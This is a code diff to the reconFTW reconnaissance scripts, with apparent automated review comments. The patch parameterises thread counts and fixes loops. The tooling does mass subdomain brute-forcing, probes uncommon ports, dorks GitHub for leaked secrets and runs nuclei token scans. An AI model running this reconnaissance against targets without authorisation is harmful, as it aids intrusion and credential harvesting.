xorg-server-xvfb tor lynx lolcat -y $DEBUG_STD + eval $SUDO pacman -Sy install python python-pip dnsutils ruby curl git libpcap nmap chromium wget jq xorg-server-xvfb tor lynx -y $DEBUG_STD eval $SUDO systemctl enable --now tor.service $DEBUG_STD } diff --git a/reconftw.cfg b/reconftw.cfg index 2ac2ff4c..c6655068 100644 --- a/reconftw.cfg +++ b/reconftw.cfg 
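Review bot: Removing `lolcat` from all three package lists while `start_spinner` (introduced in the previous patch) still runs `_spinner "start" "${1}" | lolcat &` leaves the spinner dependent on a binary the installer no longer provides, unless a hunk of this patch outside this view also drops the pipe. If the pipe stays, either keep the package here or guard it in reconftw.sh with `command -v lolcat >/dev/null 2>&1 || lolcat() { cat; }`; if the pipe goes, this hunk is fine as is.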
@@ -91,12 +91,21 @@ FULLSCOPE=false DIFF=false REMOVETMP=false -## HTTP options +# HTTP options COOKIE="" HEADER="User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0" +# Threads +FFUF_THREADS=40 +HTTPX_THREADS=50 +HTTPX_UNCOMMONPORTS_THREADS=150 +SHUFFLEDNS_THREADS=5000 +GOSPIDER_THREADS=50 +GITDORKER_THREADS=5 +XSSTRIKE_THREADS=30 + # lists fuzz_wordlist=${tools}/fuzz_wordlist.txt lfi_wordlist=${tools}/lfi_wordlist.txt subs_wordlist=${tools}/subdomains.txt -resolvers=${tools}/resolvers.txt +resolvers=${tools}/resolvers.txt \ No newline at end of file diff --git a/reconftw.sh b/reconftw.sh index e66246a5..e82e9f35 100755 --- a/reconftw.sh +++ b/reconftw.sh @@ -102,7 +102,7 @@ function google_dorks(){ end_func "Results are saved in osint/dorks.txt" ${FUNCNAME[0]} else if [ "$GOOGLE_DORKS" = false ]; then - printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" else printf "${yellow} ${FUNCNAME[0]} are already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi 
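Review bot: The last pair of lines changes `resolvers=${tools}/resolvers.txt` only by dropping its trailing newline (`\ No newline at end of file`), which is churn that will resurface in every later diff of this file; restore the newline. The new `# Threads` block would benefit from a one-line comment on what the numbers mean for the tools and the network, e.g. `# Concurrency handed to each tool; lower these on rate-limited links or shared resolvers`, since `SHUFFLEDNS_THREADS=5000` in particular is an aggressive default to leave undocumented.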
@@ -116,9 +116,9 @@ function github_dorks(){ if [ -s "${GITHUB_TOKENS}" ] then if [ "$DEEP" = true ] ; then - eval python3 $tools/GitDorker/GitDorker.py -tf ${GITHUB_TOKENS} -e 5 -q $domain -p -d $tools/GitDorker/Dorks/alldorksv3 | grep "\[+\]" | grep "git" | anew -q osint/gitdorks.txt $DEBUG_STD + eval python3 $tools/GitDorker/GitDorker.py -tf ${GITHUB_TOKENS} -e $GITDORKER_THREADS -q $domain -p -d $tools/GitDorker/Dorks/alldorksv3 | grep "\[+\]" | grep "git" | anew -q osint/gitdorks.txt $DEBUG_STD else - eval python3 $tools/GitDorker/GitDorker.py -tf ${GITHUB_TOKENS} -e 5 -q $domain -p -d $tools/GitDorker/Dorks/medium_dorks.txt | grep "\[+\]" | grep "git" | anew -q osint/gitdorks.txt $DEBUG_STD + eval python3 $tools/GitDorker/GitDorker.py -tf ${GITHUB_TOKENS} -e $GITDORKER_THREADS -q $domain -p -d $tools/GitDorker/Dorks/medium_dorks.txt | grep "\[+\]" | grep "git" | anew -q osint/gitdorks.txt $DEBUG_STD fi sed -r -i "s/\x1B\[([0-9]{1,3}(;[0-9]{1,2})?)?[mGK]//g" osint/gitdorks.txt else @@ -127,7 +127,7 @@ function github_dorks(){ end_func "Results are saved in osint/gitdorks.txt" ${FUNCNAME[0]} else if [ "$GITHUB_DORKS" = false ]; then - printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi 
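Review bot: `-e $GITDORKER_THREADS` is unquoted and has no default, so with a reconftw.cfg that predates this patch (the variable is defined only there) the expansion vanishes and GitDorker receives `-e -q`, turning `-q` into the argument of `-e`. The same applies to `$SHUFFLEDNS_THREADS`, `$HTTPX_THREADS`, `$GOSPIDER_THREADS`, `$HTTPX_UNCOMMONPORTS_THREADS`, `$FFUF_THREADS` and `$XSSTRIKE_THREADS` in the sub_brute, sub_dns, sub_scraping, sub_permut, webprobe_simple, webprobe_full, fuzz, urlchecks, jschecks and xss hunks. Either use a defaulted expansion at each site, `-e "${GITDORKER_THREADS:-5}"`, or assert the whole set once after the config is sourced, `: "${GITDORKER_THREADS:?set in reconftw.cfg}"`. The function continues outside the hunk.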
@@ -145,7 +145,7 @@ function metadata(){ end_func "Results are saved in osint/[software/authors/metadata_results].txt" ${FUNCNAME[0]} else if [ "$METADATA" = false ]; then - printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -183,7 +183,7 @@ function emails(){ end_func "Results are saved in osint/[emails/users/h8mail/passwords].txt" ${FUNCNAME[0]} else if [ "$EMAILS" = false ]; then - printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi 
@@ -212,21 +212,21 @@ function domain_info(){ if [ -s ".tmp/domain_registrant_email.txt" ] then - for sub in $(cat .tmp/domain_registrant_email.txt); do + for line in $(cat .tmp/domain_registrant_email.txt); do lynx -dump $line | tail -n +18 | sed -n '/]domainbigdata.com/q;p' >> osint/domain_info_email.txt && echo -e "\n\n#######################################################################\n\n" >> osint/domain_info_email.txt done fi if [ -s ".tmp/domain_registrant_ip.txt" ] then - for sub in $(cat .tmp/domain_registrant_ip.txt); do + for line in $(cat .tmp/domain_registrant_ip.txt); do lynx -dump $line | tail -n +18 | sed -n '/]domainbigdata.com/q;p' >> osint/domain_info_ip.txt && echo -e "\n\n#######################################################################\n\n" >> osint/domain_info_ip.txt done fi end_func "Results are saved in osint/domain_info_[general/name/email/ip].txt" ${FUNCNAME[0]} else if [ "$DOMAIN_INFO" = false ]; then - printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -282,8 +282,6 @@ function sub_passive(){ if [ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ] then start_subfunc "Running : Passive Subdomain Enumeration" - #start=`date +%s` - #printf "${yellow} Running : Passive Subdomain Enumeration${reset}\n\n" eval subfinder -d $domain -o .tmp/subfinder.txt $DEBUG_STD eval assetfinder --subs-only $domain $DEBUG_ERROR | anew -q .tmp/assetfinder.txt eval amass enum -passive -d $domain -config $AMASS_CONFIG -o .tmp/amass.txt $DEBUG_STD 
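Review bot: The loop variable now matches the `$line` used in the body, but both loops still read their input with `for line in $(cat …)`, which word-splits and globs every line before it reaches `lynx -dump $line`, and the two loops are identical apart from the input and output file names. A small helper taking the input and output file and running `while IFS= read -r url; do lynx -dump "$url" | tail -n +18 | sed -n '/]domainbigdata.com/q;p' >> "$2"; done < "$1"` (plus the separator line) would remove the duplication and the splitting; quoting `"$line"` is the minimum change if the loops stay. The files being read are produced earlier in the function, outside the hunk.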
@@ -292,10 +290,6 @@ function sub_passive(){ timeout 5m waybackurls $domain | unfurl --unique domains | anew -q .tmp/waybackurls.txt NUMOFLINES=$(eval cat .tmp/subfinder.txt .tmp/assetfinder.txt .tmp/amass.txt .tmp/findomain.txt .tmp/crobat.txt .tmp/waybackurls.txt $DEBUG_ERROR | sed "s/*.//" | anew .tmp/passive_subs.txt | wc -l) end_subfunc "${NUMOFLINES} new subs (passive)" ${FUNCNAME[0]} - #touch $called_fn_dir/.${FUNCNAME[0]} - #end=`date +%s` - #getElapsedTime $start $end - #notification "${NUMOFLINES} new subdomains found with passive techniques in ${runtime}" good else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -305,8 +299,6 @@ function sub_crt(){ if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$SUBCRT" = true ] then start_subfunc "Running : Crtsh Subdomain Enumeration" - #start=`date +%s` - #printf "${yellow} Running : Crtsh Subdomain Enumeration${reset}\n\n" cd $tools/crtfinder eval python3 crtfinder.py -u $domain $DEBUG_STD outputfile=${domain%%.*} @@ -336,12 +328,9 @@ function sub_crt(){ touch $called_fn_dir/.${FUNCNAME[0]} NUMOFLINES=$(eval cat .tmp/crtsh_subs_tmp.txt $DEBUG_ERROR | anew .tmp/crtsh_subs.txt | wc -l) end_subfunc "${NUMOFLINES} new subs (cert transparency)" ${FUNCNAME[0]} - #end=`date +%s` - #getElapsedTime $start $end - #notification "${NUMOFLINES} new subdomains by certificate transparency found in ${runtime}" good else if [ "$SUBCRT" = false ]; then - printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi 
@@ -352,18 +341,12 @@ function sub_brute(){ if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$SUBBRUTE" = true ] then start_subfunc "Running : Bruteforce Subdomain Enumeration" - #start=`date +%s` - #printf "${yellow} Running : Bruteforce Subdomain Enumeration${reset}\n\n" - eval shuffledns -d $domain -w $subs_wordlist -r $resolvers -t 5000 -o .tmp/active_tmp.txt $DEBUG_STD + eval shuffledns -d $domain -w $subs_wordlist -r $resolvers -t $SHUFFLEDNS_THREADS -o .tmp/active_tmp.txt $DEBUG_STD NUMOFLINES=$(eval cat .tmp/active_tmp.txt $DEBUG_ERROR | sed "s/*.//" | anew .tmp/brute_subs.txt | wc -l) end_subfunc "${NUMOFLINES} new subs (bruteforce)" ${FUNCNAME[0]} - #touch $called_fn_dir/.${FUNCNAME[0]} - #end=`date +%s` - #getElapsedTime $start $end - #notification "${NUMOFLINES} new subdomains by bruteforce found in ${runtime}" good else if [ "$SUBBRUTE" = false ]; then - printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi 
@@ -374,20 +357,14 @@ function sub_dns(){ if [ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ] then start_subfunc "Running : Active Subdomain Enumeration" - #start=`date +%s` - #printf "${yellow} Running : Active Subdomain Enumeration${reset}\n\n" cat .tmp/*_subs.txt | anew -q .tmp/subs_no_resolved.txt deleteOutScoped $outOfScope_file .tmp/subs_no_resolved.txt - eval shuffledns -d $domain -list .tmp/subs_no_resolved.txt -r $resolvers -t 5000 -o .tmp/subdomains_tmp.txt $DEBUG_STD + eval shuffledns -d $domain -list .tmp/subs_no_resolved.txt -r $resolvers -t $SHUFFLEDNS_THREADS -o .tmp/subdomains_tmp.txt $DEBUG_STD echo $domain | dnsx -silent | anew -q .tmp/subdomains_tmp.txt dnsx -retry 3 -silent -cname -resp-only -l .tmp/subdomains_tmp.txt | grep ".$domain$" | anew -q .tmp/subdomains_tmp.txt eval dnsx -retry 3 -silent -cname -resp -l subdomains/subdomains.txt -o subdomains/subdomains_cname.txt $DEBUG_STD NUMOFLINES=$(eval cat .tmp/subdomains_tmp.txt $DEBUG_ERROR | anew subdomains/subdomains.txt | wc -l) end_subfunc "${NUMOFLINES} new subs (dns resolution)" ${FUNCNAME[0]} - #touch $called_fn_dir/.${FUNCNAME[0]} - #end=`date +%s` - #getElapsedTime $start $end - #notification "${NUMOFLINES} new subdomains by dns resolution found in ${runtime}" good else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi 
@@ -397,21 +374,15 @@ function sub_scraping(){ if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$SUBSCRAPING" = true ] then start_subfunc "Running : Source code scraping subdomain search" - #start=`date +%s` - #printf "${yellow} Running : Source code scraping subdomain search${reset}\n\n" touch .tmp/scrap_subs.txt - cat subdomains/subdomains.txt | httpx -follow-host-redirects -H "${HEADER}" -status-code -timeout 15 -silent -no-color | cut -d ' ' -f1 | grep ".$domain$" | anew -q .tmp/probed_tmp.txt - gospider -S .tmp/probed_tmp.txt --js -t 50 -H "${HEADER}" --sitemap --robots -w -r | egrep -o 'https?://[^ ]+' | sed 's/]$//' | unfurl --unique domains | grep ".$domain$" | anew -q .tmp/scrap_subs.txt - cat .tmp/scrap_subs.txt | eval shuffledns -d $domain -r $resolvers -t 5000 -o .tmp/scrap_subs_resolved.txt $DEBUG_STD + cat subdomains/subdomains.txt | httpx -follow-host-redirects -H "${HEADER}" -status-code -threads $HTTPX_THREADS -timeout 15 -silent -no-color | cut -d ' ' -f1 | grep ".$domain$" | anew -q .tmp/probed_tmp.txt + gospider -S .tmp/probed_tmp.txt --js -t $GOSPIDER_THREADS -H "${HEADER}" --sitemap --robots -w -r | egrep -o 'https?://[^ ]+' | sed 's/]$//' | unfurl --unique domains | grep ".$domain$" | anew -q .tmp/scrap_subs.txt + cat .tmp/scrap_subs.txt | eval shuffledns -d $domain -r $resolvers -t $SHUFFLEDNS_THREADS -o .tmp/scrap_subs_resolved.txt $DEBUG_STD NUMOFLINES=$(eval cat .tmp/scrap_subs_resolved.txt $DEBUG_ERROR | anew subdomains/subdomains.txt | wc -l) end_subfunc "${NUMOFLINES} new subs (code scraping)" ${FUNCNAME[0]} - #touch $called_fn_dir/.${FUNCNAME[0]} - #end=`date +%s` - #getElapsedTime $start $end - #notification "${NUMOFLINES} new subdomains by scraping found in ${runtime}" good else if [ "$SUBSCRAPING" = false ]; then - printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" 
else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi 
@@ -422,30 +393,28 @@ function sub_permut(){ if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$SUBPERMUTE" = true ] then start_subfunc "Running : Permutations Subdomain Enumeration" - #start=`date +%s` - #printf "${yellow} Running : Permutations Subdomain Enumeration${reset}\n\n" if [[ $(cat .tmp/subs_no_resolved.txt | wc -l) -le 50 ]] then - eval dnsgen .tmp/subs_no_resolved.txt --wordlist $tools/permutations_list.txt $DEBUG_ERROR | eval shuffledns -d $domain -r $resolvers -t 5000 -o .tmp/permute1_tmp.txt $DEBUG_STD + eval dnsgen .tmp/subs_no_resolved.txt --wordlist $tools/permutations_list.txt $DEBUG_ERROR | eval shuffledns -d $domain -r $resolvers -t $SHUFFLEDNS_THREADS -o .tmp/permute1_tmp.txt $DEBUG_STD eval cat .tmp/permute1_tmp.txt $DEBUG_ERROR | anew -q .tmp/permute1.txt - eval dnsgen .tmp/permute1.txt --wordlist $tools/permutations_list.txt $DEBUG_ERROR | eval shuffledns -d $domain -r $resolvers -t 5000 -o .tmp/permute2_tmp.txt $DEBUG_STD + eval dnsgen .tmp/permute1.txt --wordlist $tools/permutations_list.txt $DEBUG_ERROR | eval shuffledns -d $domain -r $resolvers -t $SHUFFLEDNS_THREADS -o .tmp/permute2_tmp.txt $DEBUG_STD eval cat .tmp/permute2_tmp.txt $DEBUG_ERROR | anew -q .tmp/permute2.txt eval cat .tmp/permute1.txt .tmp/permute2.txt $DEBUG_ERROR | anew -q .tmp/permute_subs.txt elif [[ $(cat .tmp/subs_no_resolved.txt | wc -l) -le 100 ]] then - eval dnsgen .tmp/subs_no_resolved.txt --wordlist $tools/permutations_list.txt $DEBUG_ERROR | eval shuffledns -d $domain -r $resolvers -t 5000 -o .tmp/permute_tmp.txt $DEBUG_STD + eval dnsgen .tmp/subs_no_resolved.txt --wordlist $tools/permutations_list.txt $DEBUG_ERROR | eval shuffledns -d $domain -r $resolvers -t $SHUFFLEDNS_THREADS -o .tmp/permute_tmp.txt $DEBUG_STD eval cat .tmp/permute_tmp.txt $DEBUG_ERROR | anew -q .tmp/permute_subs.txt else if [[ $(cat subdomains/subdomains.txt | wc -l) -le 50 ]] then - eval dnsgen subdomains/subdomains.txt --wordlist $tools/permutations_list.txt 
$DEBUG_ERROR | eval shuffledns -d $domain -r $resolvers -t 5000 -o .tmp/permute1_tmp.txt $DEBUG_STD + eval dnsgen subdomains/subdomains.txt --wordlist $tools/permutations_list.txt $DEBUG_ERROR | eval shuffledns -d $domain -r $resolvers -t $SHUFFLEDNS_THREADS -o .tmp/permute1_tmp.txt $DEBUG_STD eval cat .tmp/permute1_tmp.txt $DEBUG_ERROR | anew -q .tmp/permute1.txt - eval dnsgen .tmp/permute1.txt --wordlist $tools/permutations_list.txt $DEBUG_ERROR | eval shuffledns -d $domain -r $resolvers -t 5000 -o .tmp/permute2_tmp.txt $DEBUG_STD + eval dnsgen .tmp/permute1.txt --wordlist $tools/permutations_list.txt $DEBUG_ERROR | eval shuffledns -d $domain -r $resolvers -t $SHUFFLEDNS_THREADS -o .tmp/permute2_tmp.txt $DEBUG_STD eval cat .tmp/permute2_tmp.txt $DEBUG_ERROR | anew -q .tmp/permute2.txt eval cat .tmp/permute1.txt .tmp/permute2.txt $DEBUG_ERROR | anew -q .tmp/permute_subs.txt elif [[ $(cat subdomains/subdomains.txt | wc -l) -le 100 ]] then - eval dnsgen subdomains/subdomains.txt --wordlist $tools/permutations_list.txt $DEBUG_ERROR | eval shuffledns -d $domain -r $resolvers -t 5000 -o .tmp/permute_tmp.txt $DEBUG_STD + eval dnsgen subdomains/subdomains.txt --wordlist $tools/permutations_list.txt $DEBUG_ERROR | eval shuffledns -d $domain -r $resolvers -t $SHUFFLEDNS_THREADS -o .tmp/permute_tmp.txt $DEBUG_STD eval cat .tmp/permute_tmp.txt $DEBUG_ERROR | anew -q .tmp/permute_subs.txt else printf "\n${bred} Skipping Permutations: Too Much Subdomains${reset}\n\n" 
@@ -459,13 +428,9 @@ function sub_permut(){ NUMOFLINES=0 fi end_subfunc "${NUMOFLINES} new subs (permutations)" ${FUNCNAME[0]} - #touch $called_fn_dir/.${FUNCNAME[0]} - #end=`date +%s` - #getElapsedTime $start $end - #notification "${NUMOFLINES} new subdomains by permutations found in ${runtime}" good else if [ "$SUBPERMUTE" = false ]; then - printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -485,7 +450,7 @@ function subtakeover(){ end_func "Results are saved in webs/takeover.txt" ${FUNCNAME[0]} else if [ "$SUBTAKEOVER" = false ]; then - printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi 
@@ -500,17 +465,13 @@ function webprobe_simple(){ if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$WEBPROBESIMPLE" = true ] then start_subfunc "Running : Http probing" - cat subdomains/subdomains.txt | httpx -follow-host-redirects -H "${HEADER}" -status-code -timeout 15 -silent -no-color | cut -d ' ' -f1 | grep ".$domain$" | anew -q .tmp/probed_tmp.txt + cat subdomains/subdomains.txt | httpx -follow-host-redirects -H "${HEADER}" -status-code -threads $HTTPX_THREADS -timeout 15 -silent -no-color | cut -d ' ' -f1 | grep ".$domain$" | anew -q .tmp/probed_tmp.txt deleteOutScoped $outOfScope_file .tmp/probed_tmp.txt NUMOFLINES=$(eval cat .tmp/probed_tmp.txt $DEBUG_ERROR | anew webs/webs.txt | wc -l) end_subfunc "${NUMOFLINES} new websites resolved" ${FUNCNAME[0]} - #touch $called_fn_dir/.${FUNCNAME[0]} - #end=`date +%s` - #getElapsedTime $start $end - #notification "${NUMOFLINES} new websites resolved in ${runtime}" good else if [ "$WEBPROBESIMPLE" = false ]; then - printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi 
@@ -521,14 +482,14 @@ function webprobe_full(){ if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$WEBPROBEFULL" = true ] then start_func "Http probing non standard ports" - cat subdomains/subdomains.txt | httpx -ports 81,300,591,593,832,981,1010,1311,1099,2082,2095,2096,2480,3000,3128,3333,4243,4567,4711,4712,4993,5000,5104,5108,5280,5281,5601,5800,6543,7000,7001,7396,7474,8000,8001,8008,8014,8042,8060,8069,8080,8081,8083,8088,8090,8091,8095,8118,8123,8172,8181,8222,8243,8280,8281,8333,8337,8443,8500,8834,8880,8888,8983,9000,9001,9043,9060,9080,9090,9091,9200,9443,9502,9800,9981,10000,10250,11371,12443,15672,16080,17778,18091,18092,20720,32000,55672 -follow-host-redirects -H "${HEADER}" -status-code -threads 150 -timeout 10 -silent -no-color | cut -d ' ' -f1 | grep ".$domain" | anew -q .tmp/probed_uncommon_ports_tmp.txt + cat subdomains/subdomains.txt | httpx -ports 81,300,591,593,832,981,1010,1311,1099,2082,2095,2096,2480,3000,3128,3333,4243,4567,4711,4712,4993,5000,5104,5108,5280,5281,5601,5800,6543,7000,7001,7396,7474,8000,8001,8008,8014,8042,8060,8069,8080,8081,8083,8088,8090,8091,8095,8118,8123,8172,8181,8222,8243,8280,8281,8333,8337,8443,8500,8834,8880,8888,8983,9000,9001,9043,9060,9080,9090,9091,9200,9443,9502,9800,9981,10000,10250,11371,12443,15672,16080,17778,18091,18092,20720,32000,55672 -follow-host-redirects -H "${HEADER}" -status-code -threads $HTTPX_UNCOMMONPORTS_THREADS -timeout 10 -silent -no-color | cut -d ' ' -f1 | grep ".$domain" | anew -q .tmp/probed_uncommon_ports_tmp.txt NUMOFLINES=$(eval cat .tmp/probed_uncommon_ports_tmp.txt $DEBUG_ERROR | anew webs/webs_uncommon_ports.txt | wc -l) notification "Uncommon web ports: ${NUMOFLINES} new websites in ${runtime}" good eval cat webs/webs_uncommon_ports.txt $DEBUG_ERROR end_func "Results are saved in webs/webs_uncommon_ports.txt" ${FUNCNAME[0]} else if [ "$WEBPROBEFULL" = false ]; then - printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg 
${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -544,7 +505,7 @@ function screenshot(){ end_func "Results are saved in screenshots folder" ${FUNCNAME[0]} else if [ "$WEBSCREENSHOT" = false ]; then - printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -569,10 +530,11 @@ function favicon(){ eval mv favicontest.txt $dir/hosts/favicontest.txt $DEBUG_ERROR eval rm favicontest.json $DEBUG_ERROR fi + cd $dir end_func "Results are saved in hosts/favicontest.txt" ${FUNCNAME[0]} else if [ "$FAVICON" = false ]; then - printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -595,9 +557,9 @@ function portscan(){ eval cat .tmp/ips_nowaf.txt $DEBUG_ERROR | sort printf "${bblue}\n Scanning ports... ${reset}\n\n"; - if [ "$PORTSCAN_PASSIVE" = true ] && [ ! -f "${domain}_portscan_passive.txt" ] + if [ "$PORTSCAN_PASSIVE" = true ] && [ ! -f "hosts/portscan_passive.txt" ] then - for sub in $(cat .tmp/ips_nowaf.txt); do + for sub in $(cat hosts/ips.txt); do shodan host $sub 2>/dev/null >> hosts/portscan_passive.txt && echo -e "\n\n#######################################################################\n\n" >> hosts/portscan_passive.txt done fi 
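Review bot: The added `cd $dir` is unquoted and unchecked; the preceding `mv favicontest.txt $dir/hosts/favicontest.txt` suggests the function changed directory earlier (outside the hunk), so a failed return leaves every later step running from that other directory and writing results into the wrong tree. Use `cd "$dir" || return 1`, or run the tool-directory part in a subshell, `( cd "<tool dir>" && … )`, so the working directory is restored automatically and this line becomes unnecessary.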
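Review bot: The passive loop now reads `hosts/ips.txt` instead of `.tmp/ips_nowaf.txt`, so `shodan host` is queried for every resolved IP including those the WAF check filtered out; if that widening is intended, a short comment, `# passive lookup covers all IPs, WAF-fronted ones included`, would stop the next reader from "fixing" it back. The guard `[ ! -f "hosts/portscan_passive.txt" ]` now matches the file the loop appends to, which is an improvement, but a run interrupted mid-loop leaves a partial file that later runs will never complete — a temporary name moved into place after the loop would avoid that. `for sub in $(cat hosts/ips.txt)` reads more safely as `while IFS= read -r sub; do …; done < hosts/ips.txt`.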
@@ -610,7 +572,7 @@ function portscan(){ end_func "Results are saved in hosts/portscan_[passive|active].txt" ${FUNCNAME[0]} else if [ "$PORTSCANNER" = false ]; then - printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -633,7 +595,7 @@ function waf_checks(){ end_func "Results are saved in webs/webs_wafs.txt" ${FUNCNAME[0]} else if [ "$WAF" = false ]; then - printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -646,7 +608,7 @@ function nuclei_check(){ start_func "Templates based web scanner" eval nuclei -update-templates $DEBUG_STD mkdir -p nuclei_output - printf "${yellow} Running : Nuclei Technologies${reset}\n\n" + printf "${yellow}\n Running : Nuclei Technologies${reset}\n\n" cat webs/webs.txt | nuclei -silent -H "${HEADER}" -t ~/nuclei-templates/technologies/ -o nuclei_output/technologies.txt printf "${yellow}\n\n Running : Nuclei Tokens${reset}\n\n" cat webs/webs.txt | nuclei -silent -H "${HEADER}" -t ~/nuclei-templates/exposed-tokens/ -o nuclei_output/tokens.txt 
